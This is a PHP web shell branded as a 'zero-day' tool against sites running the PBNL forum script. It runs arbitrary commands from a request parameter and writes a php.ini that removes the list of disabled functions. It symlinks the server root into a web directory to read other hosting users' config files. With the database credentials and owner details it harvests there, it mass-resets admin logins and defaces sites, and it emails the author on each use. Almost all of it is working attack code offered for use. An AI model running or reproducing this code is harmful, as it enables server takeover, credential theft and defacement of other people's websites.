PHP Decode

echo '<center><p><font face=Webdings size=6>
	<h1>!</b></font><b><a href="?" style="text-decoration:none;"><font face="Verdana" size="5">
	PANDORA PBNL ZeR0-DaY SCRIPT</b></font></a><font face=Webdings size=6><b>!</h1></font></p></center><br><br>';
echo'<center><b>Hack D Hackers</b><br>

<b>Welcome to my simple 0-day attack 0n pbnl forum script using methods:- SQLi, Symlinking and DB jumping</b></center><br>

<center><table><tr><td><a href="?forum&defaceforum"><font color="green" size="4">| PBNL AUTO Defacer |</font></a></td>
		<td><a href="?x=pbnl-reset"><font color="white" size="4">| Manual Password Changer Attack  |</font></a></td>
		<td><a href="?mysqli"><font color="white" size="4">| AUTO SQLi ATTaCk Attack  |</font></a></td>
		<td><a href="?x=mrportalpbnlattack"><font color="green" size="4">| Auto Mass Password Changer Attack |</font></a></td>
		</tr></table></center><br>';
$ownerEmail = "[email protected]";
$url = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
//*************************************************************/

// -------------- Traceback Functions

function mail_alert()
{
    global $ownerEmail;
    global $url;
    $accesedIp = $_SERVER['REMOTE_ADDR'];
    $randomInt = rand(0,1000000);           # to avoid id blocking
    $from = "[email protected]"; 
    
    //echo $from;
    
    if(function_exists('mail'))
    {
        $subject = "Shell Accessed -- PbNl Zer0 Day --";
        $message = "
Hey Mrportal Da HaCkLOrD ,
        
        Your Shell(pbnl 0day) located at $url was accessed by $accesedIp
        
        If its not you :-
        
        1. Please check if the hacker is misusing Ur Zer0day.
        2. Else Tell me To Delete myself From there
        and Kick that ****** out!
        
        Thanking You
        
Yours Faithfully
PbnL Zer0-DaY Robot
        ";
        mail($ownerEmail,$subject,$message,'From:'.$from);
    }
}
 $head = '
<html>
<head>
<LINK REL="SHORTCUT ICON" HREF="http://www.senojflags.com/images/national-flag-icons/Nigeria-Flag.png" />
<link href="http://fonts.googleapis.com/css?family=Candal" rel="stylesheet" type="text/css">
<script type="text/javascript" src="http://smilenet4u.googlecode.com/files/TipingText.js"></script>
</script>
<title>--==::: PBNL AUTO 3XPLOITER BY MRPORTAL :::==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE type=text/css>BODY { 



    background: url(https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-prn2/p480x480/1513848_605049699561228_487487271_n.jpg) center no-repeat fixed; 
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover; background-color:#000000;
 } 
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border			: dashed 1px;
border-color		: #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border			: dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin			: -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}

A:link {
	COLOR: White; TEXT-DECORATION: none
}
A:visited {
	COLOR: White; TEXT-DECORATION: none
}
A:hover {
	color: Red; TEXT-DECORATION: none
}
A:active {
	color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}
</script>
</head><body>';
$pals="Al.MaX, Skenpo, Cyber Army,  African B|@CkOut, Pius Princewill,Geracole,indishell, BabaModder, Slow poison, Steph4gunners, Fidelis Sunnex Moblord, Don Nweze Ikechukwu, Mohamm?d Maxx Khyder, Adetunji Olalekan Lekksite, Prince Ogosime, Blessing Abel, Onedo Godspower Da WebCash, Onochie Jibunoh, Ikechukwu Michael Suicekid, Adedurin Da Boss JuNior, Mayowa-Oladele BabaModder Mayor-Wizard, Nnaemeka Oluchi Dices, Leke Ojikutu, Benedict Goodluck, Ebuka Victor James, Ofulue Martins Pascal, Greg Ramsey White, Gbolagun Myhacklord, Monday Chuks AbanumGabriel OkhaiAdeyemo Yusuff Horlawaley Yusadolat, Prince Omowa Hackerslord Pezzin?, Hackmaster Patricson, Frank Afenikhena, Hacky Pat, Jessica Ogonna Eze, Chidi Awunor, Ade Niyi Biyi, Christain Philip, Richie Awunor, Busari Omotola Adeyinka, DjDesmond Blaze, Eboh Onyeka Charles, Chinasa Petra Ofozor, Pako Flores, James Awunor, Agbeniga Musefiu Oyebamiji, Ottah Dickson, Ode Jo-WizzyAhanoma Gift, Chiang Yo Kay, Sunday DonrespectAdebisi Olumide, Mordi Chijioke AlexTha Real DopeKid, Holies Obaro, Chime Ogechi Blessing, Patience Obapolor Izegbuwa, Akaeze Benedict Oluchi, Jvak Epopo Lordstylish, Pwolson Habila Dang, Segxiano Ipea Seglord, Owolabi Ope, John Joe, Onyeka HoseaRocky Sir-XLoaded, Oyi Francis, Terry Jeremiah, Arinbomen Brunolin Orians, Igwe Chiedozie Kelvin, Chris Dsea, Iwunor Uche, Lil Jojo Da Xquisit II, Esther Esegba, Emmanuel Samcyn Nod, Onyemaechi Blessmilord Onojake, Agboola Oyebanji Johnnystickz, Adegbenro Tosin TuslotCharles Madezia, Iz Alexis, Jason Sky, Daniel Ottah Onyeka, Prince Da Kidz, Achikeh JoshuaNnaemeka Uche Raymond, TwinPascal Twinbrain, Nwab Blacks Emmy States, Okaleka Ifeanyi John, Sniggle Ugwu, Samuel Almax Ndah, Hassan Jnr II, Obuma Ewere Lewis, Chris Potters, Pius Princewill, Marian Okoye, Oseji Ifeanyi, Prince Fred AgboOsasunafc Jos, Olamide Prince, Bless Boss, Ifeanyi Ihemenem, Oluwasegun Moni D Great Ruler, Darlington Bright VincentRaj Owede, Christian Edirin Manuwa, Chukwudi Bobbyfab Ekwenugo, Jony Hackermaster Freebrowsing D great, Akindejoye Samuel TeeboyNasiru Victor, Imrankhan Grey-hat SiriusAyuba Ghazali, Blessing Anita, Sani Hashim, Tammy Micheal, Akinwale Kolins Valentino, Ejeh, Jordan Avwerosuo Ofuomare, Kingsley Jankulovski, Comr Emmanuel Akazue, Sunday Victor, Oduneye Dahmmylahray David Odusxboy, Tookidblaze Kings, Israel Omene, Prosper Ihedinachi, Nuruddeen A AdamuBaron Maxi, Chuks Sebastian Chuks, Peace Adubor, Abuleh Ify, Cyberworld D great, Ngozindubueze Theresa, Saw DzLareton Pascal, Razzyboy Olatunji, Monye Wisdom, Agbugba Kingsley Johnpaul Dubem, Sunshine Ifeanyi, Israel Brainstorm Ayeni, Uthman Naheem Mr-white, Holhuwargbenga Thobi Thab, Forlaarjime Fapohunda, Tony Godsent Ikechukwu, Au Zango, Abusufian Ibraheem";
echo $head ;
if(isset($_REQUEST['portal'])){
        echo "<hr><pre><b>";
        $portal = ($_REQUEST['portal']);
        system($portal);
        echo "</b></pre>";
        die;
		}
if(isset($_GET['x']) && ($_GET['x'] == 'mrportalpbnlattack'))
{
		echo $head ;
		echo '
<div align=center><font color=white font size=4><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="3" width="50%"><span class="footerlink">Special Shout Out goes to my best buddies:-  Sunnex, "Analike Geracole who i dont think knows Me", Al.Max Hacker, Ike4b|@st, And Many Others.  <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif></span></marquee><br></font></div>
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >

			

       <td width="100%" align=center valign="top" rowspan="1">
           <font color=green size=5 face="comic sans ms"><b>--==::: CYBER ARMY 3T AFRICAN B|@CK OUT :::==--</font><font color=white size=5 face="comic sans ms"><b><br> <font color=green size=5 face="comic sans ms">--==:::[[ <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> PBNL_PANDORA Mass  </font><font color=white size=5 face="comic sans ms">Admin Panel Username/Password </font><font color=green size=5 face="comic sans ms"><b> Changer By MRPORTAL <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> ]]:::==-- </font> <div class="hedr"> 

        <td height="10" align="left" class="td1"></td></tr><tr><td 
        width="100%" align="center" valign="top" rowspan="1"><font 
        color="red" face="comic sans ms"size="1"><b> 
        <font color=green> 
        ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font><br><font color=white>-==[[Greetzing to all My internet Pals]]==--</font><br> '.$pals.' <br>

<font color=white>--==[[Dedicated to]]==--</font>
<br># All Young HacKerZ and My Ex Student/Teacher Bro. John Ngene and My Lovly Princess Ikoko who taught me all i need to know in Physics #<br><font color=white>--==[[Interface/Css Desgined By]]==--</font><br><font color=red>Deepika Kaushik and Portal</font><br><font color=green> 
        ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font>
						
           </table>
        
</table>
'; 

echo'
<body bgcolor=black><h3 style="text-align:center">
 <form method=post><font color=white size=3 face="comic sans ms">Look, this PBNL trick work same way the  it works in Pandora Shell but differntly..<br>After some lonely night of coding pandora i created this trick<br>Hey, Run php.ini first of all :) <br>The button given below generates php.ini file :)</font><br>
<input type=submit name=ini value="use to Generate PHP.ini" /></form>
';
if(isset($_POST['ini']))
	{
		
		$r=fopen('php.ini','w');
		$rr=" disable_functions=none ";
		fwrite($r,$rr);
		$link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
		echo $link;
		echo "<br>";
		}
		
		echo'<div align=center><table width=60%><tr><td align=center><form method=post><font color=white size=3 face="comic sans ms">I will Try My best to Change Username/Pass for all sites using PBNL script in this host/whole server :)</font><br>
<input type=submit name=whole value="Change User/Pass for whole server" /></form><font color=white size=3 face="comic sans ms"></font></td><td align=center><form method=post><font color=white size=3 face="comic sans ms">this PBNL_PANDORA Trick will help you change Admin Username/Pass for a Particular User or Site using PBNL script in this host</font></br><input type=submit name=particular value="change user/pass for particualr users" /></form></font></td></tr></table><br>';
		if(isset($_POST['whole']))
{
echo "<font color=white size=3 face=\"comic sans ms\">Hey , please fill the username/password that you want to set on admin panel :)<br><form method=post><font color=white size=3 face=\"comic sans ms\">";
echo "username:<input type=text name=uname value=Pandora><br>";
echo "Password<input type=text name=pass value=pbnlpandora></font><br>";
echo "<input type=submit name=start value=\"startx Me and i will Mass Attack all PBNL Sites8-)\"><p>";

}
error_reporting(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
{

$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=trim($ar1[0]);
return $ar;
}


if(isset($_POST['start']))
{

$uname=$_POST['uname'];
$pass=$_POST['pass'];


////////////////////////////////////////////////////////
/////////////////// pandora symlink v1 ///////////////////
////////////////////////////////////////////////////////

mkdir('pbnlpandora',0777);
$rr = " Options all 
 DirectoryIndex Sux.html 
 AddType text/plain .php 
 AddHandler server-parsed .php 
 AddType text/plain .html 
 AddHandler txt .html 
 Require None 
 Satisfy Any";
$g = fopen('pbnlpandora/.htaccess','w');
fwrite($g,$rr);
symlink("/","pbnlpandora/root");
if(!is_dir('pbnlpandora/root'))
{
echo "sorry bro, pandora shell script could not symlink / folder :( ";
}
else
{
$cmd="awk -F : '($3>500) && ($3!=65534) && ($3!=1000)' /etc/passwd | cut -f 1 -d ':' ";
$c=shell_exec($cmd);
$usr=explode("
",$c);
foreach($usr as $us )
{

$u=trim($us);

$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/pbnlpandora/root/home/';
$confi=array("settings.php","moduls/settings.php","moduls/init.php");
foreach($confi as $co)
{
$uurl=@file_get_contents($base_url.$u."/public_html/".$co);

if($uurl && preg_match('/dbname/i',$uurl))
{

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> website cms is PBNL of user $u </font></td></tr></table>";
$wl=$base_url.$u."/public_html/".$co;
$text=file_get_contents($wl);

$uname=$_POST['uname'];
$dbu=entre2v2($text,'$dbuser = "','";');
$dbp=entre2v2($text,'$dbpass = "','";');
$dbn=entre2v2($text,'$dbname = "','";');
$dbsn=entre2v2($text,'$config->url = "','";');
$dbso=entre2v2($text,'$config->owner = "','";');
$dbno=entre2v2($text,'$config->mobile = "','";');
$dbfb=entre2v2($text,'$config->fb = "','";');
$phost=entre2v2($text,'$dbhost = "','";');
$tp= 'b_';

$npwd= md5($pass);
$host="localhost";
$dbconnect=@ mysql_connect($phost,$dbu,$dbp);
$dbselect=@ mysql_select_db($dbn,$dbconnect);
if($dbselect)
{
echo "<font color=red>database $dbn has been selected<br>";

$ru=@ mysql_query("UPDATE `".$tp."users` SET `username` ='".$uname."' WHERE userID = 1") ;
$ru= @ mysql_query("UPDATE `".$tp."users` SET `password` ='".$npwd."' WHERE userID = 1") ;
$ru= @ mysql_query("UPDATE `".$tp."users` SET `level` ='2' WHERE userID = 1") ;
$req =entre2v2($text,'$config->url = "','";');
echo "website is ".$req;
if(!$ru)
{
echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>";
}
else {

echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>congrats Hacker, username $uname and password $pass has been updated for ID=1 :D</font></td></tr></table><br>";
}

}
}
}
}
}


}
if(isset($_POST['particular']))
{

echo'<font size=3 color=white face="comic sans ms">Put the pbnl website usernames for mass user/password change<br></font>
<form method=post>
<font size=3 color=white face="comic sans ms"> username:<input type=text name=uname value=Pandora><br>
Password<input type=text name=pass value=pbnlpandora></font><br>
<font color=red size=3 face="comic sans ms">user list<br><textarea rows=6 cols=45 name=wen></textarea>
<br><br><input type=submit name=cant value="hacker.... click me and i will try to hex this PBNL shit with pandora" /></form><p>';

}
if(isset($_POST['cant']))
{

error_reporting(0);
$uname=$_POST['uname'];
$pass=$_POST['pass'];

$users=$_POST['wen'];

mkdir('pbnlpandora',0777);
$rr  = " Options all 
 DirectoryIndex Sux.html 
 AddType text/plain .php 
 AddHandler server-parsed .php 
  AddType text/plain .html 
 AddHandler txt .html 
 Require None 
 Satisfy Any";
$g = fopen('pbnlpandora/.htaccess','w');
fwrite($g,$rr);
symlink("/","pbnlpandora/root");
$use=explode("
",$users);



foreach($use as $us){
$u=trim($us);
echo "<font color=red size=3 face=\"comic sans ms\">".$u;
$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/pbnlpandora/root/home/';
$confi=array("settings.php","moduls/settings.php","moduls/init.php");
foreach($confi as $co)
{
$uurl=@file_get_contents($base_url.$u."/public_html/".$co);

if($uurl && preg_match('/dbname/i',$uurl))
{

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> website cms is PBNL SCRIPT of user $u </font></td></tr></table>";
$wl=$base_url.$u."/public_html/".$co;
$text=file_get_contents($wl);

$uname=$_POST['uname'];
$dbu=entre2v2($text,'$dbuser = "','";');
$dbp=entre2v2($text,'$dbpass = "','";');
$dbn=entre2v2($text,'$dbname = "','";');
$dbsn=entre2v2($text,'$config->url = "','";');
$dbso=entre2v2($text,'$config->owner = "','";');
$dbno=entre2v2($text,'$config->mobile = "','";');
$dbfb=entre2v2($text,'$config->fb = "','";');
$phost=entre2v2($text,'$dbhost = "','";');
$tp= 'b_';

echo "<font color=red><u>Enumerating Data from PBNL site</u><br>
Site name is <b>$dbsn</b><br> The owner of the PBNL Site You are Attacking is <b>$dbso</b><br>If you wish to contact him, here is his details, Mobile No is $dbno and Fan page is facebook.com/$dbfb <br> database $dbn can be exploited<br><br>


Still Trying To Get Database with PBnL 0-Zero Day....";



$npwd= md5($pass);
$host="localhost";
$dbconnect=@ mysql_connect($phost,$dbu,$dbp);
$dbselect=@ mysql_select_db($dbn,$dbconnect);
if($dbselect)
{
echo "<font color=red>database $dbn has been selected<br>";

$ru=@ mysql_query("UPDATE `".$tp."users` SET `username` ='".$uname."' WHERE userID = 1") ;
$ru= @ mysql_query("UPDATE `".$tp."users` SET `password` ='".$npwd."' WHERE userID = 1") ;
$ru= @ mysql_query("UPDATE `".$tp."users` SET `level` ='2' WHERE userID = 1") ;
$req =entre2v2($text,'$config->url = "','";');
echo "website is ".$req;
if(!$ru)
{
echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>";
}
else {

echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>Script kiddies, our work here is done, username $uname and password $pass has been updated for ID=1 :D</font></td></tr></table><br>";
   // --------------------- Tracebacks --------------------------------
            if($ownerEmail == '[email protected]')
            {
                mail_alert();
            }
            // ------------------------------------------------------------------
}

}
}

}
}


}



}  
if(isset($_GET['x']) && ($_GET['x'] == 'pbnl-reset'))
{	

echo '<form action="" method="post">';

echo "<center/><br/><b><font color=#00ff00>+--==[  PBNL Reset Password  ]==--+</font></b><br> Make Sure you Input All Field Correctly, else Exploit might not work<br>Incase you dont ve details.. All PBNL SITES are Vulnerable to SQLi, Details Can begotten through the PBNL Zer0-Day Exploit<br><br>";
  
  if(empty($_POST['pwd']))
  {
  
echo "<FORM method='POST'>
<table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to PBNL-SITE mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Hostname</td><td>
<input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;pbnl dbname</td><td>
<input style='width:220px;' class='inputz' type='text' name='database' value='' /></td></tr> <tr><td>&nbsp;&nbsp;pbnl db user</td><td>
<input style='width:220px;' class='inputz' type='text' name='username' value='root' /></td></tr> <tr><td>&nbsp;&nbsp;pbnl db pass</td><td>
<input style='width:220px;' class='inputz' type='text' name='password' value='' /></td></tr>
<tr><td>&nbsp;&nbsp;New Admin</td><td>
<input style='width:220px;' class='inputz' type='text' name='admin' value='Mrportal' /></td></tr>
 <tr><td>&nbsp;&nbsp;New Pass</td><td>
<input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />&nbsp;

<input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
</td></tr> </table><br><br><br><br>
";
}
else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$pwd   = $_POST['pwd'];
$admin = $_POST['admin'];


 @mysql_connect($localhost,$username,$password) or die(mysql_error());
 @mysql_select_db($database) or die(mysql_error());

$hash = md5($pwd);
$a4s=@mysql_query("UPDATE b_users SET username ='".$admin."' WHERE level = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE b_users SET password ='".$hash."' WHERE level = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE b_users SET username ='".$admin."' WHERE level = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE b_users SET password ='".$hash."' WHERE level = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE b_users SET username ='".$admin."' WHERE level = 4") or die(mysql_error());
$a4s=@mysql_query("UPDATE b_users SET password ='".$hash."' WHERE level = 4") or die(mysql_error());
$a4s=@mysql_query("UPDATE b_users SET email ='".$SQL."' WHERE level = 2") or die(mysql_error());


if($a4s){
echo "<div id='example2'><font color='#FFFFFF'><b>#..L...O....A....D...I...N...G....#</b></div></font><br> <div id='example1'>###############################################################<br>
MANUAL PBNL ADMIN RESET PASSWORD BASED ON MYSQLi VULNERABILITY<br>
VULNERABLE VERSION: ALL PBNL AFFECTED<br>
EXPLOITATION BASED: MYSQL InJection, SYMLINKING AND DATABASE JUMPING<br>
DISCOVERED & CODED BY: MRPORTAL DA HACK LORD<br>
http://facebook.com/mbosinwa<br>
http://waploaded.com/mrportal<br>
###############################################################<br><br>
<font color='pinkblue'>
root@MrP0r7al:~$ Connecting to database......<br>

root@MrP0r7al:~$ ".$username."@".$localhost." Connected! .......<br>
root@MrP0r7al:~$ <b>[+]./Attempting to Poison</b> <u>".$database."</u><br>
root@MrP0r7al:~$ <b>[+]./Searching For All Tables</b> on <u>".$database."</u><br>
root@MrP0r7al:~$ <b>[+]./Tables Found! Escalating to Columns</b><br>
root@MrP0r7al:~$ <b>[+]./Upadating Username and Password</b>
<br><br> [+]./Your Attack look likes it was Successful ..!! :)) PBNL-ADMIN CHANGED to <span style='font-size: large;'><span style='color: rgb(255, 255, 255);'><span style='font-weight: bold; text-shadow: 0px 0px 10px;'><u>".$admin."</u></span></span></span> And Password to <span style='font-size: large;'><span style='color: rgb(255, 255, 255);'><span style='font-weight: bold; text-shadow: 0px 0px 10px;'><u>".$pwd."</u></span></span></span> </b><br> </div></font>";
 //sendmail();
 

}
}
}
//if(isset($_GET['x']) && ($_GET['x'] == 'pbnl-reset'))
if(isset($_POST['forumdeface']))
	{
		$localhost =  $_POST['f1']; 
			$database =  $_POST['f2']; 
			$username =  $_POST['f3']; 
			$password =  $_POST['f4']; 
			$catid = $_POST['f5'];
			$index    =  $_POST['index'];
			$urlindex    =  $_POST['urlindex'];
			$preindex    =  $_POST['preindex'];
			$prefix    =  $_POST['prefix'];
if($_POST['forumdeface'] == "Hack pbnl")
		{
			
			if($database=$_POST['f2'])
			{
				$con =@ mysql_connect($localhost,$username,$password) or die(mysql_error()); 
				$db =@ mysql_select_db($database,$con) or die(mysql_error());   
				if($prefix == "" || $prefix == null)
					$query = "UPDATE b_updates SET prefix='$index', title='$preindex', url='$urlindex' WHERE id='$catid'" or die(mysql_error());
				else
				$query = "INSERT INTO `".$prefix."updates` (`id`, `prefix`, `title`, `url`) VALUES (NULL, '$index', '$preindex', '$urlindex')" or die(mysql_error());
				
					/*$query = "UPDATE ".$prefix."updates SET prefix='$index', title='<b><font color=red>$preindex</font></b>', url='$urlindex' WHERE id='$catid'" or die(mysql_error());*/
				$result =@ mysql_query($query,$con);
				if($result)
				{ 
					echo "<center><font color=lime size=4><blink><h1>PBNL site Defaced Successfully, Login Member Section to View See your defacement</h1></blink></font></center>";
				     // --------------------- Tracebacks --------------------------------
            if($ownerEmail == '[email protected]')
            {
                mail_alert();
            }
            // ------------------------------------------------------------------
				}
				else
				{
					echo "<center><font color=red size=4><blink>Cannot Deface PBNL Site</blink></font></center>";
				}
			}
		}
		}
		

if(isset($_GET["forum"]))
	{ 
		echo '<b>To begin attack..  Launch [+] New feature <a href="?mysqli">Auto Database Enumeration</a> to get ur victims database/all details</b><br>';
		
		if(isset($_GET["defaceforum"]))
		{ 

echo '<center><br/><b><font color=#00ff00>+--==[  PBNL Site Defacement  ]==--+</font></b><br></center>
			<form action="" method = "POST">
			<table border = "1" width="50%" height="316" style="text-align: center" align="center"> 
				<tr>
					<td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
					<p>
						Table Prefix : <input type="text" name="prefix" value="b_" class="sbox"> (Optional) Leave Empty Only if you Know Last Upadate ID</td>
					</p>
					</td>
				</tr>
				<tr>
					<td height="105" width="780">
					<p align="center"><b>Deface HTML Message&nbsp;:</b> <textarea rows=6 cols=45 name="index">lol ! You Are Hacked !!!</textarea></p>
					<p align="center"><b>Message Prefix&nbsp;:</b> <input class="box" type="text" name="preindex" size="20" value="Attacker From PBNL PANDORA ZerOdaY !!!!"></p>
					<p align="center"><b>Your Site Url&nbsp;:</b> <input class="box" type="text" name="urlindex" size="20" value="http://fb.com/mbosinwa"></p><b>Last Upadate ID : </b><input class="sbox" type="text" name="f5" size="20" value="250">(Optional) If Table Prefix is Empty Input the ID else Ignore<br>&nbsp;<input type = "submit" class="but" value = "Hack pbnl" name="forumdeface"> </p></td>
					
				</tr>
			</table>
			</form>';
			} 
		}
		
		if(isset($_GET['mysqli']))
{

echo'<br><center><br/><b><font color=#00ff00>+--==[  PBNL AuTO SqLinjection   Database Enumeration ]==--+</font></b><br></center><font size=3 color=white face="comic sans ms">Put the pbnl site Server Username. for instance naijaloaded.com username is naijaloade, u72359631 mostly for free hosting etc (Note: Free HOSTING is not allowed)<br><hr></font>
<form method=post>
<font color=red size=3 face="comic sans ms">Site Server Username: <textarea rows=1 cols=25 name=ren></textarea>
<br><br><input type=submit name=enu value="hacker.... click me and i will try to Inject and Enumerate this PBNL shit with pandora" /></form><p>';


if(isset($_POST['enu']))
{

error_reporting(0);

function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
{

$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=trim($ar1[0]);
return $ar;
}
$users=$_POST['ren'];

mkdir('pbnlpandora',0777);
$rr  = " Options all 
 DirectoryIndex Sux.html 
 AddType text/plain .php 
 AddHandler server-parsed .php 
  AddType text/plain .html 
 AddHandler txt .html 
 Require None 
 Satisfy Any";
$g = fopen('pbnlpandora/.htaccess','w');
fwrite($g,$rr);
symlink("/","pbnlpandora/root");
$use=explode("
",$users);



foreach($use as $us){
$u=trim($us);
echo "<font color=red size=3 face=\"comic sans ms\">".$u;
$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/pbnlpandora/root/home/';
$confi=array("settings.php","moduls/settings.php","moduls/init.php");
foreach($confi as $co)
{
$uurl=@file_get_contents($base_url.$u."/public_html/".$co);

if($uurl && preg_match('/dbname/i',$uurl))
{

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> website cms is PBNL SCRIPT of user $u </font></td></tr></table>";
$wl=$base_url.$u."/public_html/".$co;
$text=file_get_contents($wl);

$users=$_POST['ren'];
$dbu=entre2v2($text,'$dbuser = "','";');
$dbp=entre2v2($text,'$dbpass = "','";');
$dbn=entre2v2($text,'$dbname = "','";');
$dbsn=entre2v2($text,'$config->url = "','";');
$dbso=entre2v2($text,'$config->owner = "','";');
$dbno=entre2v2($text,'$config->mobile = "','";');
$dbfb=entre2v2($text,'$config->fb = "','";');
$phost=entre2v2($text,'$dbhost = "','";');
$tp= 'b_';

echo "Still Trying To Get Database with PBnL 0-Zero Day...... <br><br>";

echo "<div id='example2'><font color='#FFFFFF'><b>#..L...O....A....D...I...N...G....#</b></div></font><br> <div id='example1'>###############################################################<br>
PBNL DATABASE ENUMERATION BASED ON MYSQLi VULNERABILITY<br>
VULNERABLE VERSION: ALL PBNL AFFECTED<br>
EXPLOITATION BASED: MYSQL InJection, SYMLINKING AND DATABASE JUMPING<br>
DISCOVERED & CODED BY: MRPORTAL DA HACK LORD<br>
http://facebook.com/mbosinwa<br>
http://waploaded.com/mrportal<br>
###############################################################<br><br>
<font color='pinkblue'>
root@MrP0r7al:~$ Connecting with username of site......<br>

root@MrP0r7al:~$ $u@$dbsn Connected! .......<br>
root@MrP0r7al:~$ <b>Attempting to Poison</b> <u>$dbsn</u><br>
root@MrP0r7al:~$ <b>FINNDING VULNERABILITY......</b><br>
root@MrP0r7al:~$ <b><font color='green'>[+]DONE......</font>  SITE INFECTED</b><br>
root@MrP0r7al:~$ <b>Enumerating Data from PBNL site</b><br>
root@MrP0r7al:~$ <b>Site name is <u>$dbsn</u></b><br>
root@MrP0r7al:~$ <b>Database Host is <u>$phost</u></b><br>
root@MrP0r7al:~$ <b>Database name is <u>$dbn</u></b><br>
root@MrP0r7al:~$ <b>Database username is <u>$dbu</u></b><br>
root@MrP0r7al:~$ <b>Database Password is <u>$dbp</u></b><br>
root@MrP0r7al:~$ <b>Trying To Bruteforce Other Details......</b><br>
root@MrP0r7al:~$ <b>Site Owner is <u>$dbso</u></b><br>
root@MrP0r7al:~$ <b>Owner Mobile is <u>$dbno</u></b><br>
root@MrP0r7al:~$ <b>Owner Fanpage is <u>http://facebook.com/$dbfb</u></b><br>
<br>";
   // --------------------- Tracebacks --------------------------------
            if($ownerEmail == '[email protected]')
            {
                mail_alert();
            }
            // ------------------------------------------------------------------
 }
}
}
	}	
	}
	
		
		echo '<script type="text/javascript">
//Define first typing example:
new TypingText(document.getElementById("example1"));

//Define second typing example (use "slashing" cursor at the end):
new TypingText(document.getElementById("example2"), 150, function(i){ var ar = new Array("_"); return " " + ar[i.length % ar.length]; });

//Type out examples:
TypingText.runAll();
</script>
		</center>	
<center>&copyPandora PBNL 0day Develop by Mrportal</center>';